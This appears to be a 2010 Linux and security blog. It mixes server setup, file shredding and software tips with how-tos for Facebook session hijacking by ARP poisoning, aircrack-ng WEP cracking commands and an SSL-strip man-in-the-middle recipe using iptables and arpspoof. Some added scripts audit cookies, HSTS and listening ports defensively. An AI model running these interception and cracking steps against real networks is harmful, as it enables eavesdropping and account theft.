MOA

Security & Administration

Saturday, May 15, 2010

Sidejacking with Hamster & Ferret



Hamster is a tool for HTTP session hijacking by passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser so you can hijack the victim's session.

In this tutorial I'm using Ettercap for ARP cache poisoning and Hamster & Ferret (H&F) for stealing a session on Facebook.

Thursday, May 13, 2010

Ubuntu 10.04 - Lamp server - Drupal




Drupal is one of the leading open-source content management systems, and it has become the favored choice of numerous organizations worldwide.

Drupal provides many useful features, which is the main reason so many leading websites run on Drupal these days. Several providers work in Drupal development services and offer expert services centered on Drupal. These include Drupal installation, Drupal improvement, Drupal templates, Drupal module development, Drupal consultancy, and many others.

A couple of famous Drupal sites:

CNN

The New York State Senate


MENSA

The White House

Tuesday, May 11, 2010

Install Ubuntu server-MYSQL-PHP-APACHE

Requirements :

Ubuntu 10.04 LTS Server
Internet connection

The first thing you need to do is download the ISO file from Ubuntu's homepage: click on the link above and choose your edition. Burn the ISO to a CD and reboot, or try it out with VirtualBox first.

This is what you'll see after you've booted it up.

Press Install Ubuntu Server and follow the guide, which is very easy.

You will be asked whether to install automatic security updates, which I would recommend.
Press space on [ ] LAMP server.

After you're done you're going to get this screen. Enter the login name and password you chose during the installation.

To test whether PHP works:

cd /var/www/
sudo nano phptest.php

Insert this line into the file and save it.




After that, type ifconfig to see your IP address.


Connect to the page from another computer connected to the internet at http://ipadress/phptest.php and you should see something like the image above. You can also test whether Apache works by going to http://ipadress/

optional..

[-.,.-*''*-.,,.-*''*-.,,.->


Install an SSH server:

sudo apt-get install openssh-server
sudo /etc/init.d/ssh restart

ftp server:

sudo apt-get install vsftpd
sudo service vsftpd restart

The configuration file is /etc/vsftpd.conf

webmin:

wget http://www.webmin.com/download/deb/webmin-current.deb

wget http://mirrors.kernel.org/ubuntu/pool/universe/libm/libmd5-perl/libmd5-perl_2.03-1_all.deb

sudo apt-get install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl

sudo dpkg -i libmd5-perl_2.03-1_all.deb

sudo dpkg -i webmin-current.deb

Connect to it by going to https://ipadress:10000/
and change the PHP configuration path to /etc/php5/apache2/

For security reasons I would recommend that you stop the FTP/SSH/Webmin services after you're done using them.

sudo /etc/init.d/ssh stop
sudo service vsftpd stop
sudo /etc/init.d/webmin stop


Then use start instead of stop to start them again when you need to.
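
An added check, not part of the original post: after running the stop commands, confirm that nothing is still listening on the FTP, SSH and Webmin ports. The function name and the sample listings are constructed for illustration; ports 21 and 22 are the service defaults and 10000 is the Webmin port from the URL above.

```shell
#!/bin/sh
# Constructed `ss -tln` listings: before and after stopping the services.
SAMPLE_BEFORE='State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       32      *:21                *:*
LISTEN  0       128     0.0.0.0:80          0.0.0.0:*
LISTEN  0       128     [::]:22             [::]:*
LISTEN  0       128     0.0.0.0:10000       0.0.0.0:*'

SAMPLE_AFTER='State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:80          0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306      0.0.0.0:*'

# still_listening (hypothetical helper): reads `ss -tln` or `netstat -tln`
# output on stdin and prints the watched services that still have a
# listening socket, or "none".
still_listening() {
    awk '
    BEGIN { svc[21] = "ftp"; svc[22] = "ssh"; svc[10000] = "webmin" }
    # ss puts LISTEN in the first column, netstat in the last one.
    $1 == "LISTEN" || $NF == "LISTEN" {
        # Local address is column 4 in both tools; the port follows the last ":".
        n = split($4, part, ":")
        port = part[n]
        if (port in svc) seen[svc[port]] = 1
    }
    END {
        out = ""
        if (seen["ftp"])    out = out "ftp "
        if (seen["ssh"])    out = out "ssh "
        if (seen["webmin"]) out = out "webmin "
        sub(/ $/, "", out)
        print (out == "" ? "none" : out)
    }'
}

printf '%s\n' "$SAMPLE_BEFORE" | still_listening
printf '%s\n' "$SAMPLE_AFTER"  | still_listening
```

On the server itself, pipe the live listing in with: ss -tln | still_listening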

[-.,.-*''*-.,,.-*''*-.,,.->

 

Useful paths & command lines :

sudo - ("su" "do") execute a command as superuser.
/var/www/ - your web folder.
top - shows your CPU, memory usage and so on.
cd - change directory.
rm - remove files.
ls - list files.
clear - clear screen.
chmod - changes access modes.
apt-get - Deb/Ubuntu software packages.
/etc/init.d/apache2 restart - restart the apache server.
service mysql restart - restart mysql server.

Monday, May 10, 2010

- [ Erasing files / hd's beyond recovery ] -

Whether you're selling your computer, have a hacker girlfriend, are super-paranoid or just want to delete your knowledge and information about UFOs beyond recovery, just deleting it won't do it.

To delete a single file, use the tool shred, which usually comes preinstalled on most distributions.

shred 'options' [filename]

Options are:
-n ( number of times you want to overwrite )
-u ( remove the file after it's done )
-z ( add a final overwrite with zeros to hide that it was shredded )

Example:

shred -u -z -n 10 area51.txt
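
An added check, not part of the original post: the script below runs shred with the same -n, -z and -u options on a constructed test file and verifies that only zero bytes remain before the file is removed. The marker string, the temp file and the function name are assumptions made for the test. shred overwrites in place, and its own documentation warns that journaling or copy-on-write filesystems may not honour that, so a passing check only covers what is readable through the file.

```shell
#!/bin/sh
# Constructed marker standing in for sensitive file content.
MARKER="CONSTRUCTED-SECRET-MARKER-7f3a"

# verify_shred PASSES (hypothetical helper)
# Returns 0 if, after `shred -z -n PASSES`, the file holds only zero bytes
# and a following `shred -u` removes it; returns 1 otherwise.
verify_shred() {
    passes=${1:-3}
    f=$(mktemp) || return 1

    # Write the marker many times so the file spans several blocks.
    i=0
    while [ "$i" -lt 500 ]; do
        printf '%s\n' "$MARKER"
        i=$((i + 1))
    done > "$f"

    # Overwrite in place but keep the file so it can be inspected.
    shred -z -n "$passes" "$f" || { rm -f "$f"; return 1; }

    # 1) The marker must no longer be readable through the file.
    if grep -q "$MARKER" "$f"; then
        rm -f "$f"; return 1
    fi

    # 2) With -z the last pass is zeros, so no non-NUL byte may remain.
    nonzero=$(tr -d '\000' < "$f" | wc -c | tr -d ' ')
    if [ "$nonzero" -ne 0 ]; then
        rm -f "$f"; return 1
    fi

    # 3) -u unlinks the file after the overwrite passes.
    shred -u -z -n 1 "$f" || { rm -f "$f"; return 1; }
    [ ! -e "$f" ]
}

verify_shred 3 && echo "shred overwrote and removed the test file"
```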

If you're even more paranoid and want to remove data from RAM and/or swap, try using the Secure Delete tools. On a Debian-based system use:

sudo apt-get install secure-delete

[-.,.-*''*-.,,.-*''*-.,,.->

If you want to erase your entire drive, download DBAN, burn it and boot it up.

You will get a couple of options; I would recommend going with ENTER.


Press space to choose the HD(s) you want to erase.


After that, press M to choose the method you want to use to erase.

For most people a quick erase is enough and the data will not be recoverable; remember that even the quick erase takes loads of time. So unless you found out who shot JFK and stored the information on your computer, go with something fast.

- [ Linux Mint 9 "Isadora" RC ] -

I decided to try out the new Linux Mint 9 "Isadora" RC release. Installation is easy as usual with Mint, nice and fast. It looks pretty similar to the previous release.


On first boot you'll notice the really fast boot time. The look and feel are pretty much the same as before. The system seems to be really fast and stable.

Honestly there is not much to say about this distro except that it works really well, fast and stable. In my opinion it is a perfect build for someone who wants to give Linux a try for the first time, or for any other desktop user out there. Please remember that this is still the RC release and it might be buggy. I don't know whether I think the new Software Manager is better or worse; one thing I really liked was the software description.

Mint tries to make things work out of the box, which is pretty nice for people who don't know how to do, or don't want to be bothered with, complicated driver installations such as Wi-Fi cards, graphics drivers, multimedia codecs etc.

New features are as follows :
  • New Software Manager
    • 30,000 packages
    • Review applications straight from the Software Manager
    • APT daemon
    • Visual improvements
  • New Backup Tool
    • Incremental backups, compression, integrity checks
    • Backup/Restoration of the software selection
  • Menu improvements
    • Editable items
    • Transparent menu
    • Always start with favorites
    • “Add to” shortcuts
  • Desktop settings
    • Changes apply immediately
    • Additional options
  • Better look & feel
    • Backgrounds
    • Welcome screen
    • Update Manager
  • System improvements
    • Windows installer
    • Husse quotes
    • USB Creator
    • Default software selection
    • Local repository and Gnome-PPP
    • Apt hold/unhold/held commands
  • Project changes
    • Community Website
    • CD & DVD
    • Community Editions
    • OEM installation disks
    • USA/Japan distributors disks
    • 32 & 64-bit
  • Upstream improvements
    • Faster boot
    • Long Term Support

System requirements:


  • x86 processor (for both 32 & 64-bit versions)
  • x86_64 compatible processor (for the 64-bit version)
  • 512 MB of system memory (RAM)
  • 3 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • CD-ROM drive or USB port
Download links:

Download Linux Mint 9 RC i386
Download Linux Mint 9 RC amd64

Saturday, May 8, 2010

- [ Delete your facebook account! how-to ] -

TERMINATE YOUR ACCOUNT NAO!

Facebook is a great social community site allowing people to get in contact with friends, family and people they have not seen in a long time. However, there are reasons for wanting to delete your account. People often complain that they don't want their private lives to be known to the public or governments, people have stalkers following them, and it has even happened that people have lost their jobs because of it. Now, you can deactivate your account pretty easily, but what if you want it permanently gone?

The first thing you should do is delete everything on your Facebook page: pictures, messages, feeds, groups, friends.. EVERYTHING. If you don't do this it will be backed up on Facebook indefinitely.

Then contact the Facebook staff:

privacy@facebook.com
comment-info-rt@facebook.com
info@facebook.com
(Try one of these and you should get a reply within a week.)

After you have received a reply from the staff, you can log in to check that you don't get a 'Reactivate your account' prompt. If you don't, congratulations, you're done.

Friday, May 7, 2010

- [ Nikto2 - Web Scanner ] -

This is a tool I really enjoy: Nikto2, a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs, checks for outdated versions of over 950 servers, and version-specific problems on over 260 servers.

On a Debian-based system you can install it by typing:
sudo apt-get install nikto

or install it from their website:
http://cirt.net/Nikto2

When you are done, just type:
nikto -h www.example.com    // example.com being the address you want to scan.


You can type sudo nikto -update to update to the latest databases and plugins. If you want to enable a proxy, go to /etc/nikto/config.txt and change the proxy settings.
Nikto2 can be a very valuable tool for web designers, pen testers and many others. A special thanks to Chris Sullo and David Lodge for developing this tool.

// Think Free -  Think Linux

- [ A few free software tips ] -

Image / 3D :

GIMP - Image editor
Paint.net - Image editor
IrfanView - Image viewer
Picasa - Image viewer
Blender - 3D rendering

notes:
GIMP is probably one of the best free graphic tools out there, if you are used to Photoshop you could always try GIMPShop to get the Photoshop look and feel.

Office :

OpenOffice - Office suite
Adobe Reader - Pdf reader
PDFCreator - Pdf creator
Sunbird - Calendar

notes:
I would definitely recommend OpenOffice to anyone; it is truly amazing free software from Sun Microsystems/Oracle and can read and export files like Microsoft Office.

Archive Managers:

7-Zip - Compression manager
Universal Extractor - file extractor
Rar - Compression manager
Unrar (found in linux package manager.)

Antivirus :

AVG free - Antivirus
Anti Vir - Antivirus
Avast - Antivirus
BitDefender - Antivirus
ClamWin - Antivirus

notes:
Do yourself a favor and get a Unix based operating system and get rid of the antivirus crap.

Internet :

Firefox - Web browser
Opera - Web browser
Chrome - Web browser
Avant Browser - Web browser
Thunderbird - Email client
WGET - Download manager
HTTrack - Offline browser

notes:
In my opinion Firefox is the ultimate web browser at the moment, with its thousands of add-ons and themes and great security features. If you want a nice fast browser you should look into Opera or Google Chrome.

Security Tools :

Wireshark - Packet analyzer
Metasploit - Framework
Kismet - Wireless scanner
Cain and Abel - Network / Password utility
Ettercap - Network utility
Nikto2 - Web server scanner
Aircrack-ng - Wireless utilities
Hping 2 and 3 - TCP/IP utility
Nmap - Port scanner

OS:

Debian
Ubuntu - Kubuntu
Mint
Fedora
Slackware
Gentoo
FreeBSD
CentOS
PCLinuxOS

Video :

VLC - Video player (codecs included)
Media Player Classic - Video Player
Zoom Player - Video Player
GOM Player - Video Player

Thursday, May 6, 2010

- [ WEP key recovery ] -

Things needed for this:
Aircrack-ng ( http://www.aircrack-ng.org/ )
A wireless adapter with packet injection capability.

airmon-ng
airmon-ng stop ‘interface’
macchanger -r ‘interface’
airmon-ng start ‘interface’

airodump-ng ‘interface’
airodump-ng -c ‘channel’ --bssid ‘bssidnr’ -w ‘file output’ ‘interface’

aireplay-ng -1 0 a ‘bssid’ -h ‘your mac adress’ -e ‘essid’ ‘interface’
aireplay-ng -3 -b ‘bssid’ -h ‘your mac adress’ ‘interface’

// Make sure to get around 20-40 thousand packets before you crack the code.

aircrack-ng -b ‘bssid’ ‘file output’















It should look something like this when you're done.

PS.
This is meant for your own WEP. Don't attack other people.

- [ SSL strip how-to ] -

MITM- attack with SSL-Strip // basically strips out the ssl from the page

Requirements :
Python >= 2.4
Python's Twisted Web
http://www.thoughtcrime.org/software/sslstrip/
A Unix based system


echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

sslstrip.py -l

arpspoof -i -t

Ps.

This is for educational purposes only.



This video demonstrates using SSL-strip with Ettercap. Please use fullscreen for a better view.
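
An added example, not from the original posts: both the cookie capture in the Hamster & Ferret post and the SSL stripping shown here work against sites that send session cookies without the Secure attribute and do not set Strict-Transport-Security. The function below audits a response's headers for those gaps; the function name, sample responses and cookie name are constructed.

```shell
#!/bin/sh
# Constructed sample responses (not captured traffic).
WEAK_RESPONSE='HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=constructed123; Path=/'

HARDENED_RESPONSE='HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: sessionid=constructed123; Path=/; Secure; HttpOnly'

# audit_headers (hypothetical helper): reads raw response headers on stdin
# and prints one finding per line, or "OK" when nothing is missing.
audit_headers() {
    tr -d '\r' | awk '
    { line = $0; lower = tolower(line) }
    lower ~ /^strict-transport-security:/ { hsts = 1 }
    lower ~ /^set-cookie:/ {
        value = substr(line, index(line, ":") + 1)
        sub(/^[ \t]+/, "", value)
        # Cookie name is everything before the first "=".
        name = substr(value, 1, index(value, "=") - 1)
        # Attributes start at the first ";" and are case-insensitive.
        semi = index(value, ";")
        attrs = (semi > 0) ? tolower(substr(value, semi)) : ""
        if (attrs !~ /;[ \t]*secure[ \t]*(;|$)/) {
            print "cookie " name ": no Secure attribute"; bad = 1
        }
        if (attrs !~ /;[ \t]*httponly[ \t]*(;|$)/) {
            print "cookie " name ": no HttpOnly attribute"; bad = 1
        }
    }
    END {
        if (!hsts) { print "response: no Strict-Transport-Security header"; bad = 1 }
        if (!bad) print "OK"
    }'
}

printf '%s\n' "$WEAK_RESPONSE" | audit_headers
printf '%s\n' "$HARDENED_RESPONSE" | audit_headers
```

Browsers only honour Strict-Transport-Security when it arrives over HTTPS, so audit the headers of the HTTPS response of your own site.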